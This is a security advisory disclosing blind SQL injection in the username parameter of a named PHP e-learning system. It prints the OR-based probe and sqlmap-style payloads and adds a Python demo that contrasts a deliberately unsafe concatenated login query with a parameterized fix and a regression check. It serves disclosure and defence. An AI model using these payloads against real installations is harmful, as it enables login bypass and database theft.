## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.14.2023
## Vendor: https://github.com/oretnom23
## Software: https://github.com/oretnom23/php-elearning-system
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection attacks.
The payloads `73152795' or 7515=7515-- ` and `13684562' or 3996=3998-- ` were each submitted in the username parameter.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can easily steal all information from the database of this system.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)

## Proof and Exploit:
[href]()

## Time spent: 01:15:00
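
The differential response from the description, reproduced against an in-memory SQLite table next to the parameterized fix. This is an added example, not code from the advisory or from php-elearning-system: the table, column and function names are assumptions, and SQLite stands in for the application's MySQL database.

```python
import sqlite3

# Constructed sample data; the schema is an assumption, not the project's own.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return db

def login_concat(db, username, password):
    """Unsafe pattern: request values are spliced into the SQL text."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_bound(db, username, password):
    """Fixed pattern: values travel as bound parameters, never as SQL text."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

# The two probe strings quoted in the description (true vs. false condition).
PROBE_TRUE = "73152795' or 7515=7515-- "
PROBE_FALSE = "13684562' or 3996=3998-- "

def responses(login):
    """Return the login result for each probe, using a fresh database."""
    db = make_db()
    return (login(db, PROBE_TRUE, "x"), login(db, PROBE_FALSE, "x"))

def is_differential(login):
    """Regression check: True when the two probes get different answers,
    i.e. the input is being evaluated as SQL rather than compared as data."""
    true_result, false_result = responses(login)
    return true_result != false_result

if __name__ == "__main__":
    print("concatenated query:", responses(login_concat))
    print("bound parameters:  ", responses(login_bound))
```

`is_differential` can be kept as a regression test for the login handler: it must return `False` once the query uses bound parameters.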